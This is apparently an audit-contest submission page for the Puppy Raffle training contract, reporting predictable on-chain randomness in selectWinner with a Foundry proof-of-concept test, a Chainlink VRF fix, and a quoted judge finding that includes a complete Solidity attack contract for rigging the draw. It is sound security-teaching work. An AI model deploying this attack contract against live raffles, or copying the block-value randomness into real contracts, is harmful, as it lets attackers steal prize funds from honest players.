Puppy Raffle

AI First Flight #1
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Submission Details
Severity: high
Valid

Weak on-chain randomness in selectWinner lets anyone predict or manipulate the winner and rarity

Root + Impact

Description

`selectWinner` is meant to pick a random winner and a random puppy rarity fairly among the players. The problem is that the "randomness" is derived from fully public, predictable, or miner-influenceable values (msg.sender, block.timestamp, block.difficulty). Anyone can compute the exact same hash off-chain before calling, and only call selectWinner when the outcome favors them. A validator can additionally manipulate block.timestamp/block.difficulty to force a specific winner or rarity.

uint256 winnerIndex =
uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length; // @> predictable
...
uint256 rarity = uint256(keccak256(abi.encodePacked(msg.sender, block.difficulty))) % 100; // @> predictable rarity

Risk

Likelihood:

  • Occurs on every call: all inputs (msg.sender, block.timestamp, block.difficulty) are known or controllable at call time.

  • An attacker computes the result off-chain and only calls selectWinner when they win, or a validator manipulates block values.

Impact:

  • An attacker can guarantee winning the raffle prize pool, stealing it from honest players.

  • An attacker can force minting a legendary-rarity NFT, breaking the intended rarity distribution.

Proof of Concept

A Foundry test computes the winner index off-chain using the same public inputs the contract uses, then runs selectWinner. The predicted winner exactly matches the actual winner, proving the outcome is fully predictable.

function test_PoC_PredictableWinner() public {
// ...4 players enter, warp past duration...
uint256 predictedIndex =
uint256(keccak256(abi.encodePacked(address(this), block.timestamp, block.difficulty))) % 4;
address predictedWinner = players[predictedIndex];
puppyRaffle.selectWinner();
assertEq(predictedWinner, puppyRaffle.previousWinner()); // prediction == reality
}
// Logs: predicted 0x...04 == actual 0x...04

Recommended Mitigation

On-chain values (msg.sender, block.timestamp, block.difficulty) are predictable and/or validator-influenceable and must never be used as a randomness source. Replace with Chainlink VRF: request randomness and assign both the winner index and the rarity inside the VRF fulfillment callback, so the outcome cannot be predicted or manipulated by the caller or a validator.

- uint256 winnerIndex =
- uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;
- address winner = players[winnerIndex];
+ // Request randomness from Chainlink VRF and select the winner in the fulfillment callback.
+ // uint256 winnerIndex = randomWordFromVRF % players.length;
+ // address winner = players[winnerIndex];
- uint256 rarity = uint256(keccak256(abi.encodePacked(msg.sender, block.difficulty))) % 100;
+ // uint256 rarity = randomWordFromVRF % 100;
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 3 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!